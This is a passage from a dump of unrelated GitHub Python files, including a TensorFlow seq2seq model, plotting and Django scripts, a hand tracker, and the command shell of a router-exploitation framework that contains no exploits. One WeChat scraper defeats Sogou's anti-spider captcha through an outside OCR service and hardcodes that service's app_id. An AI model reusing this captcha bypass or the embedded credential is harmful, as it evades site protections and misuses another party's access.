\"https://weixin.sogou.com/antispider/?from=/weixin?type=2&s_from={}\".format(quote(quo))\n }\n data = {\n \"c\": captcha_code,\n \"r\": \"https://weixin.sogou.com/antispider/?from=/weixin?type=2&s_from={}\".format(quote(quo)),\n \"v\": 5\n }\n response = self.requester.post(url, header_dict=headers, data_dict=data)\n response.encoding = \"utf-8\"\n result_data = to_json(response.text)\n logger.info(\"result_data : {}\".format(result_data))\n result_code = result_data.get('code', None)\n if result_code == 0:\n snuid = data.get(\"id\")\n self.update_cookie(snuid)\n return True\n else:\n logger.error('verify captcha code failed. ')\n captcha_code = self.get_captcha_code(keyword)\n return self.verify_captcha_code(captcha_code, keyword)\n\n @retry(max_retries=3, exceptions=(HttpInternalServerError, TimedOutError, RequestFailureError), time_to_sleep=2)\n def ocr_captcha_code(self, base_str):\n url = 'https://nmd-ai.juxinli.com/ocr_captcha'\n headers = {'Content-Type': 'application/json'}\n data = {\n \"image_base64\": base_str,\n \"app_id\": \"71116455&VIP@NzExMTY0NTUmVklQ\",\n \"ocr_code\": \"0000\"\n }\n try:\n req = self.requester.post(url=url, data_dict=data, submission_type=\"json\", header_dict=headers).json()\n logger.info(\"get captcha code success resp :{}\".format(req))\n if req.get(\"errorcode\") == 0:\n return req.get(\"string\")\n else:\n raise HttpInternalServerError\n except Exception as e:\n raise e\n\n\ndef get_handler(*args, **kwargs):\n return SouGouGongZhongHaoSpider(*args, **kwargs)\n","repo_name":"gaoyuan3593/lyricalSpider_docker","sub_path":"service/micro/wechat/sougou_gzh.py","file_name":"sougou_gzh.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41121772151","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport random\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom mt_ie import seq2seq\nfrom mt_ie import data_utils\n\n\nclass Seq2SeqModel(object):\n\n def __init__(self,\n source_vocab_size,\n target_vocab_size,\n encoder_length,\n decoder_length,\n size,\n num_layers,\n max_gradient_norm,\n batch_size,\n learning_rate,\n learning_rate_decay_factor,\n beam_size=1,\n num_samples=1024,\n use_dropout=False,\n use_adam_opt=False,\n do_decode=False,\n dtype=tf.float32):\n with tf.variable_scope(\"seq2seq_model_initialization\"):\n self.source_vocab_size = source_vocab_size\n self.target_vocab_size = target_vocab_size\n self.encoder_length = encoder_length\n self.decoder_length = decoder_length + 1 # Include the EOS symbol.\n self.beam_size = beam_size\n self.batch_size = None\n self.learning_rate = tf.get_variable(\n \"learning_rate\", [],\n trainable=False,\n dtype=dtype,\n initializer=tf.constant_initializer(learning_rate))\n self.learning_rate_decay_op = self.learning_rate.assign(\n self.learning_rate * learning_rate_decay_factor)\n self.global_step = tf.get_variable(\n \"global_step\", [],\n trainable=False,\n initializer=tf.constant_initializer(0))\n self.val_best = tf.get_variable(\n \"val_best\", [],\n trainable=False,\n initializer=tf.constant_initializer(0.0))\n\n # Create an output projection for sampled softmax.\n output_projection = None\n softmax_loss_function = None\n if num_samples > 0 and num_samples < self.target_vocab_size:\n # The default variable initializer is uniform_unit_scaling_initializer.\n w = tf.get_variable(\"proj_w\", [size, self.target_vocab_size],\n dtype=dtype)\n w_t = tf.transpose(w)\n b = tf.get_variable(\"proj_b\", [self.target_vocab_size], dtype=dtype)\n output_projection = (w, b)\n\n def sampled_loss(inputs, labels):\n labels = tf.reshape(labels, [-1, 1])\n local_w_t = tf.cast(w_t, tf.float32)\n local_b = tf.cast(b, tf.float32)\n local_inputs = tf.cast(inputs, tf.float32)\n return tf.cast(\n tf.nn.sampled_softmax_loss(local_w_t, local_b,\n local_inputs, labels,\n num_samples, self.target_vocab_size),\n dtype)\n softmax_loss_function = sampled_loss\n\n # Define cells for encoder and decoder.\n encoder_cell = tf.nn.rnn_cell.BasicLSTMCell(size)\n decoder_cell = tf.nn.rnn_cell.BasicLSTMCell(size)\n if use_dropout:\n encoder_cell = tf.nn.rnn_cell.DropoutWrapper(\n encoder_cell, output_keep_prob=0.5, input_keep_prob=0.5)\n decoder_cell = tf.nn.rnn_cell.DropoutWrapper(\n decoder_cell, output_keep_prob=0.5, input_keep_prob=0.5)\n if num_layers > 1:\n encoder_cell = tf.nn.rnn_cell.MultiRNNCell([encoder_cell] * num_layers)\n decoder_cell = tf.nn.rnn_cell.MultiRNNCell([decoder_cell] * num_layers)\n\n # Feeds for inputs.\n self.encoder_inputs = []\n self.decoder_inputs = []\n self.target_weights = []\n self.list_of_mask = []\n for i in xrange(self.encoder_length):\n self.encoder_inputs.append(tf.placeholder(\n tf.int32,\n shape=[self.batch_size],\n name=\"encoder{0}\".format(i)))\n\n for i in xrange(self.decoder_length + 1): # Include the Go symbol.\n # decoder_inputs = [Go, w_1, w_2, ..., w_n, EOS]\n self.decoder_inputs.append(tf.placeholder(\n tf.int32,\n shape=[self.batch_size],\n name=\"decoder{0}\".format(i)))\n self.target_weights.append(tf.placeholder(\n dtype,\n shape=[self.batch_size],\n name=\"weight{0}\".format(i)))\n self.list_of_mask.append(tf.placeholder(\n tf.int32,\n shape=[self.batch_size],\n name=\"mask{0}\".format(i)))\n\n # Sequence length for dynamic rnn.\n self.encoder_input_length = tf.placeholder(\n tf.int32,\n shape=[self.batch_size],\n name=\"encoder_input_length\")\n\n # Targets are decoder inputs shifted by one.\n # targets = [w_1, w_2, ..., w_n, EOS]\n targets = [self.decoder_inputs[i + 1]\n for i in xrange(len(self.decoder_inputs) - 1)]\n\n self.outputs, self.loss, self.beams = seq2seq.model(\n self.encoder_inputs[:self.encoder_length],\n self.decoder_inputs[:self.decoder_length],\n targets[:self.decoder_length],\n self.target_weights[:self.decoder_length],\n self.encoder_input_length,\n self.list_of_mask[:self.decoder_length],\n encoder_cell,\n decoder_cell,\n num_encoder_symbols=self.source_vocab_size,\n num_decoder_symbols=self.target_vocab_size,\n embedding_size=size,\n beam_size=beam_size,\n output_projection=output_projection,\n softmax_loss_function=softmax_loss_function,\n dtype=dtype)\n\n if output_projection is not None:\n self.projected_outputs = [\n tf.matmul(output, output_projection[0]) + output_projection[1]\n for output in self.outputs]\n else:\n self.projected_outputs = self.outputs\n\n if not do_decode:\n # Optimization for training the model.\n params = tf.trainable_variables()\n if use_adam_opt:\n opt = tf.train.AdamOptimizer()\n else:\n opt = tf.train.GradientDescentOptimizer(self.learning_rate)\n gradients = tf.gradients(self.loss, params)\n clipped_gradients, self.gradient_norm = tf.clip_by_global_norm(gradients,\n max_gradient_norm)\n self.updates = opt.apply_gradients(zip(clipped_gradients, params),\n global_step=self.global_step)\n\n self.saver = tf.train.Saver(tf.global_variables())\n\n\n def step(self, session, encoder_inputs, decoder_inputs, target_weights,\n encoder_input_length, list_of_mask, batch_size, do_decode=False):\n if len(encoder_inputs) != self.encoder_length:\n raise ValueError(\"Encoder length must be equal to the one in bucket,\"\n \" %d != %d.\" % (len(encoder_inputs), self.encoder_length))\n if len(decoder_inputs) != self.decoder_length:\n raise ValueError(\"Decoder length must be equal to the one in bucket,\"\n \" %d != %d.\" % (len(decoder_inputs), self.decoder_length))\n if len(target_weights) != self.decoder_length:\n raise ValueError(\"Weights length must be equal to the one in bucket,\"\n \" %d != %d.\" % (len(target_weights), self.decoder_length))\n\n input_feed = {}\n for l in xrange(self.encoder_length):\n input_feed[self.encoder_inputs[l].name] = encoder_inputs[l]\n for l in xrange(self.decoder_length):\n input_feed[self.decoder_inputs[l].name] = decoder_inputs[l]\n input_feed[self.target_weights[l].name] = target_weights[l]\n input_feed[self.list_of_mask[l].name] = list_of_mask[l]\n\n # Since targets are decoder inputs shifted by one, we need one more.\n last_target = self.decoder_inputs[self.decoder_length].name\n input_feed[last_target] = np.zeros([batch_size], dtype=np.int32)\n\n input_feed[self.encoder_input_length.name] = encoder_input_length\n\n if not do_decode:\n output_feed = [self.updates,\n self.gradient_norm,\n self.loss]\n else:\n if self.beam_size > 1:\n output_feed = self.beams\n else:\n output_feed = [self.loss]\n for l in xrange(self.decoder_length):\n output_feed.append(self.projected_outputs[l])\n\n outputs = session.run(output_feed, input_feed)\n if not do_decode:\n return outputs[1], outputs[2], None\n else:\n if self.beam_size > 1:\n return None, None, outputs\n return None, outputs[0], outputs[1:]\n\n\n def get_batch(self, data_set, feed_previous_rate=1, pos=-1):\n encoder_inputs, decoder_inputs = [], []\n encoder_input_length = []\n references = []\n\n for i in xrange(0, 64): # self.batch_size + 1):\n if pos is None:\n # random samples.\n encoder_input, decoder_input, pair_id = random.choice(data_set)\n else:\n pos += 1\n if pos != 0 and pos % len(data_set) == 0:\n random.shuffle(data_set)\n break\n encoder_input, decoder_input, pair_id = data_set[pos%len(data_set)]\n\n\n # Check if Unknown tokens are in the input\n has_ukn = True if data_utils.UNK_ID in encoder_input else False\n\n # Encoder inputs are padded.\n encoder_pad = [data_utils.PAD_ID] * (self.encoder_length - len(encoder_input))\n encoder_inputs.append(list(encoder_input + encoder_pad))\n\n # Record the meaningful encoder input length.\n encoder_input_length.append(len(encoder_input))\n\n # Decoder inputs get a starting symbol \"GO\", and are padded.\n decoder_pad = [data_utils.PAD_ID] * (self.decoder_length - len(decoder_input) - 1)\n decoder_inputs.append([data_utils.GO_ID] + decoder_input + decoder_pad)\n\n # Save references for evaluation.\n references.append([pair_id, decoder_input, has_ukn])\n\n encoder_input_length = np.array(encoder_input_length, dtype=np.int32)\n\n # batch_size is not necessarily equal to self.batch_size.\n batch_size = len(encoder_inputs)\n\n # Create the list of masks.\n list_of_mask = []\n full_matrix = np.full((batch_size), int(feed_previous_rate * 100))\n for length_idx in xrange(self.decoder_length):\n mask = np.greater(full_matrix,\n np.random.randint(100, size=(batch_size))).astype(np.float32)\n list_of_mask.append(mask)\n\n\n # Now create time-major vectors from the data seleted above.\n batch_encoder_inputs, batch_decoder_inputs, batch_weights = [], [], []\n\n for length_idx in xrange(self.encoder_length):\n batch_encoder_inputs.append(\n np.array([encoder_inputs[batch_idx][length_idx]\n for batch_idx in xrange(batch_size)], dtype=np.int32))\n\n for length_idx in xrange(self.decoder_length):\n batch_decoder_inputs.append(\n np.array([decoder_inputs[batch_idx][length_idx]\n for batch_idx in xrange(batch_size)], dtype=np.int32))\n # Create target_weights to be 0 for targets that are padding.\n batch_weight = np.ones(batch_size, dtype=np.float32)\n for batch_idx in xrange(batch_size):\n if length_idx < self.decoder_length - 1:\n target = decoder_inputs[batch_idx][length_idx + 1]\n if length_idx == self.decoder_length - 1 or target == data_utils.PAD_ID:\n batch_weight[batch_idx] = 0.0\n batch_weights.append(batch_weight)\n\n\n\n return (batch_encoder_inputs, batch_decoder_inputs, batch_weights,\n encoder_input_length, list_of_mask, batch_size, references,\n pos)\n\n","repo_name":"sheng-z/cross-lingual-open-ie","sub_path":"mt_ie/seq2seq_model.py","file_name":"seq2seq_model.py","file_ext":"py","file_size_in_byte":12793,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"21"} +{"seq_id":"4164437730","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pathlib\nimport os\nimport utility as ut\nimport sys\n\n\n\n\ndef hbonds(filename, show = False, min_frame = 0, max_frame = 8001):\n x = []\n y = []\n with open(filename) as f:\n for line in f:\n if line[0] != '#' and line[0] != '@':\n cols = line.split()\n if len(cols) == 2 and float(cols[0]) >= min_frame and float(cols[0]) <= max_frame:\n x.append(float(cols[0]))\n y.append(float(cols[1]))\n name = filename.split('/')[-1].split('.')[0]\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.set_xlim(min_frame, max_frame)\n ax1.set_title(name)\n ax1.set_xlabel(\"Time (ns)\")\n ax1.set_ylabel(\"Hydrogen bonds\")\n ax1.plot(x,y, c=\"b\")\n print(np.arange(min_frame, max_frame, 1000))\n ax1.set_xticks(np.arange(min_frame, max_frame, 1000))\n ax1.set_xticklabels(np.arange(min_frame / 20, max_frame/20, 50))\n leg = ax1.legend()\n ut.show_or_save(name + '.png', show)\n\n\namino_acid_pair = sys.argv[1]\nligand_amino_acids = sys.argv[2]\n\nhbonds(amino_acid_pair)\nhbonds(ligand_amino_acids, min_frame = 4500, max_frame = 7000)\n","repo_name":"giacThePhantom/computational-biophysics-project","sub_path":"data-analysis/plot_hbonds.py","file_name":"plot_hbonds.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41300673205","text":"\nimport json\nimport os\n\nfrom django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.views.generic import FormView, CreateView\nimport requests\nfrom dotenv import load_dotenv\nfrom django.urls import reverse_lazy, reverse\nfrom urllib.parse import urlencode\nimport logging\nimport inspect\nimport pprint\n\nfrom .models import SearchModel\nfrom .forms import SearchForm\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\ndotenv_path = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), '.env')\nload_dotenv(dotenv_path)\n\n\ngurume_search_api_key = os.environ['RECURIT_API_KEY']\ngurume_search_url = 'http://webservice.recruit.co.jp/hotpepper/gourmet/v1/'\n\narea_data = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'area.csv')\narea_items = []\nwith open(area_data, 'r') as r:\n r = r.read() \n t = r.split('\\n')\n for i in t:\n area_items.append(tuple(i.split(',')))\n\n\ndef map_func(request):\n if request.method == 'POST':\n lat, lng = request.POST['current'].replace(' ', '').replace('\\r', '').replace('\\n', ',').split(',')\n \n info = {\n 'key': gurume_search_api_key,\n 'range': request.POST['area'],\n 'lat': lat,\n 'lng': lng,\n 'format': 'json',\n 'count': 100,\n 'genre': request.POST['genre'],\n }\n print(info)\n responce = requests.get(gurume_search_url, info)\n responce_json = responce.json()\n json_data = responce_json['results']['shop']\n if json_data:\n shop_data = []\n for i in json_data:\n shop_data.append({\n 'name': i['name'],\n 'lat': i['lat'],\n 'lng': i['lng'],\n 'access': i['access'],\n 'address': i['address'],\n 'photo': i['photo']['pc']['l'],\n 'urls': i['urls']['pc'],\n })\n else:\n redirect_url = reverse('search')\n parameter = urlencode({\n 'data_is_none': '店舗が存在しません'\n })\n url = f'{redirect_url}?{parameter}'\n return redirect(url)\n \n return render(request, 'map.html', {'shop_data': shop_data, 'center_lat': lat, 'center_lng': lng})\n\ndef search_func(request):\n form = SearchForm()\n if 'data_is_none' in request.GET:\n return render(request, 'search.html', {\n 'form': form,\n 'data_is_none': request.GET['data_is_none'],\n })\n logging.info(request)\n return render(request, 'search.html', {'form': form})\n \n \n\n \n \n","repo_name":"toguchi-taichi/Restaurant_search","sub_path":"searchapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23295707143","text":"string = '\"alpha\",\"beta\",\"gamma\",\"delta\"\\n1,2,3,4\\n5.0,6.0,7.0,8.0'\nsplit_strings = [x.split(',') for x in string.split('\\n')]\nstring_arr = []\nfor string_part in split_strings :\n fixed_string_part = []\n for element in string_part :\n if '\"' in element :\n fixed_element = element[1:-1]\n elif '.' in element :\n fixed_element = float(element)\n else:\n fixed_element = int(element)\n fixed_string_part.append(fixed_element)\n string_arr.append(fixed_string_part)\nprint(string_arr)\n","repo_name":"snowthesprite/assignment-problems","sub_path":"Assigns/Assignment_47/refactor_string_processing.py","file_name":"refactor_string_processing.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29271962120","text":"from setuptools import setup\n\ninstall_requires = [\n 'google-api-python-client==1.6.3',\n]\n\ntest_requires = [\n]\n\nsetup(\n name='pydataproc',\n version='0.7.1',\n author='Oli Hall',\n author_email='',\n description=\"Python wrapper for the Google DataProc client\",\n license='MIT',\n url='https://github.com/oli-hall/py-dataproc',\n packages=['pydataproc'],\n setup_requires=[],\n install_requires=install_requires,\n tests_require=test_requires,\n)\n","repo_name":"oli-hall/py-dataproc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13016980917","text":"import http\nimport io\nimport json\nimport pathlib\nimport re\nfrom unittest import mock\n\nimport requests\n\nfrom twitter_aggregator.api import ApiConfig\nfrom twitter_aggregator.cli import CliConfig\nfrom twitter_aggregator.main import Config, configure_cli\n\n\nclass FakeSession(requests.Session):\n def get(self, url: str, **kwargs) -> requests.Response: # type: ignore[override]\n response = mock.MagicMock(\n status_code=http.HTTPStatus.OK, spec=requests.Response\n )\n if \"/2/users/by?usernames\" in url:\n raw_data = pathlib.Path(\n \"twitter_aggregator/testdata/get_users.json\"\n ).read_text()\n data = json.loads(raw_data)\n response.json.return_value = data\n elif \"/2/users/\" in url:\n raw_data = pathlib.Path(\n \"twitter_aggregator/testdata/get_tweets.json\"\n ).read_text()\n data = json.loads(raw_data)\n response.json.return_value = data\n elif \"/2/tweets/\" in url:\n match = re.compile(r\"/2/tweets/(\\d+)\").search(url)\n assert match is not None\n\n id = match[1]\n raw_data = pathlib.Path(\n f\"twitter_aggregator/testdata/get_tweet_{id}.json\"\n ).read_text()\n data = json.loads(raw_data)\n response.json.return_value = data\n else:\n raise ValueError(\"Unexpected url: %s\" % url)\n\n return response\n\n\ndef test_calculates_stats():\n # Arrange.\n buffer = io.StringIO()\n config = Config(\n api=ApiConfig(base_path=\"\", bearer_token=\"\"),\n cli=CliConfig(\n debug=False,\n queried_profile_name=\"Google\",\n most_common_count=10,\n max_results=100,\n ),\n )\n cli = configure_cli(config, buffer, session=FakeSession())\n\n # Act.\n cli.run()\n\n # Assert.\n output = buffer.getvalue()\n assert \"hashtags_count=3\" in output\n assert \"mentions_count=55\" in output\n assert (\n \"most_common_hashtags=[('GABI', 1), ('NextBillionUsers', 1), ('Pixel6', 1)]\"\n in output\n )\n assert (\n \"most_common_mentions=[('Google', 3), ('gmail', 2), ('SwaveDigest', 1),\"\n in output\n )\n","repo_name":"piotrszyma/twitter-aggregator","sub_path":"twitter_aggregator/main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32509124258","text":"import cv2\nimport mediapipe as mp\nimport time\nimport serial\n\narduino=serial.Serial(\"/dev/cu.usbmodem143301\",9600)\n#ensure that the port matches arduino\n#second argument is setting baud rate\n\nprint(arduino.name)\n\n\nclass handDetector():\n def __init__(self,mode=False,maxHands=3,detectionCon=0.5,trackCon=0.5):\n self.mode=mode\n self.maxHands=maxHands\n self.detectionCon=detectionCon\n self.trackCon=trackCon\n #variable\n #general parameters of the hands class. see the documations of Hands\n self.mpHands = mp.solutions.hands # taking the hands model from the google mediapipe\n self.hands = self.mpHands.Hands(self.mode,self.maxHands,self.detectionCon,self.trackCon) # write parameters inside the brackets\n # write nothing because using the default parameters (see what those are)\n self.mpDraw = mp.solutions.drawing_utils\n # provided that draws points on your hand\n #^ just initializing the class\n\n def findHands(self,img,draw=True):\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n self.results = self.hands.process(imgRGB)\n\n if self.results.multi_hand_landmarks: # if multiple hands are detected\n for handLms in self.results.multi_hand_landmarks:\n if draw:\n #only draw if true\n self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS) # wont draw on RGB\n # extract information from each hand\n return img\n\n def findPosition(self,img,handNo=0,draw=True):\n\n lmList=[]\n if self.results.multi_hand_landmarks:\n myHand=self.results.multi_hand_landmarks[handNo]\n\n for id, lm in enumerate(myHand.landmark):\n # gets info from each hand\n # each hand has numbered landmarks and its x,y,z coodinates are printed\n # for example the tip of your thumb has a landmark and so on\n # print(id,lm)\n h, w, c = img.shape\n cx, cy = int(lm.x * w), int(lm.y * h)\n # position of the centre landmark x*w landmark y*h\n # height width and channel\n\n lmList.append([id,cx,cy])\n # basically gives the x and y coordinates of each landmark\n # will print for all 20 landmarks\n # therefore print id as well\n # then you can use certain IDs for certain tasks\n if draw:\n cv2.circle(img, (cx, cy), 8, (255, 0, 0), cv2.FILLED)\n return lmList\n\n\n\n\n\n #dummy code to showcase what the module can do\n #basically you can copy the code below to run in a different project\ndef main():\n\n pTime = 0 # previous time\n cTime = 0 # current time\n # used to track the FPS\n cap = cv2.VideoCapture(0)\n detector=handDetector() #default parameters already set\n\n while True:\n success, img = cap.read()\n img=detector.findHands(img,draw=False)\n lmList=detector.findPosition(img,draw=False)\n #find position method returns a list of hand positions\n if len(lmList) !=0:\n print(lmList[8])\n x='X'+str((lmList[8][1]))\n y='Y'+str((lmList[8][2]))\n print(x)\n print(y)\n arduino.write(bytes(x, 'utf-8'))\n arduino.write(bytes(y, 'utf-8'))\n #index 1 is x\n #index 2 is y\n #where land mark 4 is the tip of the thumb\n # 8 is the finger tip\n\n\n # for calculating fps\n cTime = time.time()\n fps = 1 / (cTime - pTime)\n pTime = cTime # previoustime becomes current time\n img = detector.findHands(img)\n cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_SIMPLEX, 3,\n (255, 0, 255), 3)\n # prints text on the image instead of the console\n # need to convert fps to a string and also round it\n # the rest is just the font, scale colour and thickness\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n\n\nif __name__==\"__main__\":\n main()","repo_name":"conordrayton/fingerTrack","sub_path":"hand_tracking/HandTrackingModule2.py","file_name":"HandTrackingModule2.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39218559920","text":"import os\n\nfrom flask import Flask, render_template, request, jsonify\nfrom flask_cors import CORS\nfrom flask_socketio import SocketIO, emit\n\nfrom chatbot import get_response\n\napp = Flask(__name__)\nCORS(app)\n# app.config['SECRET_KEY'] = 'secret!'\n# socketio = SocketIO(app)\n\n\n@app.route(\"/\", methods=['GET'])\ndef index():\n return render_template(\"base.html\")\n\n\n@app.route(\"/predict\", methods=['POST'])\ndef predict():\n text = request.get_json().get(\"message\")\n response = get_response(text)\n message = {'answer': response}\n return jsonify(message)\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n # socketio.run(app, port=int(os.environ.get('PORT', '5000')))\n","repo_name":"ameermustafa/codefest21","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4412303071","text":"from card_group import CardGroup\nfrom pyglet.shapes import Rectangle\nimport pyglet\n\n#看了一下可能只能这么调用了\n# class Parent: # 定义父类\n# def myMethod(self):\n# print('调用父类方法')\n\n# class Child(Parent): # 定义子类\n# def myMethod(self):\n# super().myMethod()\n# print('调用子类方法')\n\n# c = Child() # 子类实例\n# c.myMethod() # 子类调用重写方法\n\n#声明成全局的,每个新的card的实例也就只是持有一个这货的指针就可以了\nsweep_sound_g = pyglet.media.load('sound/mixkit-explainer-video-game-alert-sweep-236.wav')\n\n#https://pyglet.readthedocs.io/en/latest/modules/shapes.html\n#Card对象,直接继承于Rectangle类\n#id,type这些估计以后都需要的\nclass Card(Rectangle):\n name = \"\"\n card_group = None\n batch = None\n\n sweep_sound = sweep_sound_g\n\n \"\"\"docstring for Card_manger\"\"\"\n def __init__(self,x,y,width,height,color,batch,name):\n super().__init__(x,y,width,height,color,batch)\n self.batch = batch\n self.name = name\n\n #ui交互用的方法,检查鼠标指针是否是在本对象范围内\n def check(self,mouse_x,mouse_y):\n if (mouse_x > self.x and mouse_x < self.x+self.width) and (mouse_y > self.y and mouse_y < self.y+self.height):\n return True\n else:\n return False\n\n #低级方法,移动卡牌\n def move(self,dx,dy):\n #self.opacity=40\n #这里鼠标的x肯定是在mouse_x > self.x and mouse_x < self.x+self.width里面的\n self.x = self.x+dx\n self.y = self.y+dy\n self.draw()\n\n #我还得加上一些文字啥的\n def draw(self):\n super().draw()\n my_lbl = pyglet.text.Label(text=self.name,\n font_name='微软雅黑',\n font_size=12,\n x=self.x+6, \n y=self.y+10,\n batch=self.batch)\n my_lbl.draw()\n\n #将cardgroup的指针返回给外界\n def getCardGroup(self):\n return self.card_group\n\n #加入某个卡组\n def joinCardGroup(self,cardGroup:CardGroup):\n #加入某个卡组,处理完一系列的成功或者意外情况之后,需要一定的逻辑\n cardGroup.join(self)\n #将自己card_group指针,和外界传过来的做好链接\n self.card_group = cardGroup\n return True\n\n #退出当前的卡组\n def leaveCardGroup(self):\n #这里不需要提供参数的原因,很简单,因为自身持有了card_group指针\n if self.card_group == None:\n #对外抛出错误,你不能离开一个空的卡组\n print(\"You cannot leave a blank card group\")\n raise Exception(\"You cannot leave a blank card group\")\n else:\n #调用卡组的remove方法,把自己剔除出卡组\n self.card_group.remove(self)\n #最后一步肯定是断开指针联系\n self.card_group = None\n return True\n\n #把自己粘附到这个卡组的坐标位置上面去\n def uiAttchToGroup(self):\n #取得自己所述的卡组的指针\n myCardGroup=self.getCardGroup()\n if myCardGroup:\n #如果指针不为空,则拿到卡组的leader的指针\n groupLeader=myCardGroup.getCardsList()[0]\n self.x = groupLeader.x\n self.y = groupLeader.y-20\n\n###END OF CARD CLASS","repo_name":"lemonhall/card_game","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26752500113","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: 'arvin'\nimport os\n\nimport utils\nfrom exceptions import ModuleImportException\nfrom template.interpreter import BaseInterpreter\nfrom utils import Color\n\n\nclass CmdInterpreter(BaseInterpreter):\n def __init__(self):\n super(CmdInterpreter, self).__init__()\n\n self.version = '0.01'\n self.banner = \"\"\".______ ______ __ __ .___________. _______ .______ .______ ____ __ ____ .__ __.\n| _ \\ / __ \\ | | | | | || ____|| _ \\ | _ \\ \\ \\ / \\ / / | \\ | |\n| |_) | | | | | | | | | `---| |----`| |__ | |_) | | |_) | \\ \\/ \\/ / | \\| |\n| / | | | | | | | | | | | __| | / | ___/ \\ / | . ` |\n| |\\ \\----.| `--' | | `--' | | | | |____ | |\\ \\----.| | \\ /\\ / | |\\ |\n| _| `._____| \\______/ \\______/ |__| |_______|| _| `._____|| _| \\__/ \\__/ |__| \\__|\n {RouterPwn}\n author: arvin\n Email: ivytin@gmail.com\n Version: {version}\n\"\"\".format(version=self.version, RouterPwn=Color.RED + 'RouterPwn' + Color.ENDC)\n self.help_info = \"\"\"Commands:\n help Print this help menu\n use Select a modules for usage\n exec Execute a command in a shell\n exit Exit RouterSploit\"\"\"\n\n self.main_modules_dirs = [module for module in os.listdir(utils.MODULES_DIR) if not module.startswith(\"__\")]\n\n def postloop(self):\n utils.print_warning('Bye!')\n\n def cmdloop(self, intro=None):\n utils.print_info(self.banner)\n super(CmdInterpreter, self).cmdloop()\n\n def do_use(self, module_path, *arg):\n module_path = utils.pythonize_path(module_path)\n module_path = '.'.join(('modules', module_path, '__interpreter__'))\n try:\n utils.import_module(module_path, 'Interpreter')()\n except ModuleImportException as err:\n utils.print_failed(err)\n\n def complete_use(self, text, *args, **kwargs):\n return [module for module in self.main_modules_dirs if module.startswith(text)]\n\n def do_show(self, args):\n for module in self.main_modules_dirs:\n utils.print_info(module, end='\\t')\n utils.print_info('')\n\n def do_exit(self, args):\n return True\n\n def help_show(self):\n pass\n\n def help_exit(self):\n utils.print_help('Exit script')\n\n\nclass ExploitInterpreter(BaseInterpreter):\n pass\n","repo_name":"ivytin/rpwd","sub_path":"cmdui.py","file_name":"cmdui.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"9845032351","text":"import os\nimport sys\nimport re\nfrom pathlib import Path\n# Create some data structures and variables for our program\n\ndef fin_analysis(filename,summary):\n \"\"\"Given a filename and directions whether or not to create a summary file,\n return the summary data and summaryfile.txt if requested \"\"\"\n budget = {}\n profit_loss_total = 0\n profit_loss_high = []\n profit_loss_low = []\n filepath = Path(filename)\n \n with open(filepath, mode = 'r') as f:\n\n # Creates an iterable \"i\" that we will use for error references.\n i = 0\n empty_lines = []\n error_dict = {}\n error_condition = False\n # Starts the main loop:\n for line in f:\n i += 1 \n if i > 0:\n \n # Checks for a specific concantenation of 3 letters for month, 4 digits for year, a comma,\n # Then everything after that in the line (which SHOULD only be numbers, but we'll double check later). \n budget_item_match = re.search(r'(\\w\\w\\w-\\d\\d\\d\\d),(.+)', line)\n\n # The above is simple to work with but creates one issue. In the second group (.+), we just grab everything after the comma because\n # Some numbers have a negative sign. We need to make certain that our second item is actually a number (imagine someone typed in \"n/a\" \n # or accidently entered a \"Q\" instead of \"1\").\n if budget_item_match:\n # Set a variable equal to our P/l as a string object, so that we can iterate through it real quick and make sure it fits the right format\n check_pl_data = budget_item_match.group(2)\n error_condition = False\n # Here we loop through each 'ch' character in the string check_data. If the ch is a negative sign or a digit, we pass. \n for ch in check_pl_data:\n if ch == \"-\":\n pass\n elif ch.isdigit():\n pass\n # Here we know there is an error, but there could be multiple errors on the same line\n elif error_condition == False:\n error_condition = True\n error_character = ch \n error_dict[i] = [line, error_character]\n # Now we know there are multiple errors, so we can just add them to the \"ch\" string\n else:\n error_character += ch\n error_dict[i] = [line, error_character]\n\n # Now we want to start tracking some P/L data as it's coming in:\n if 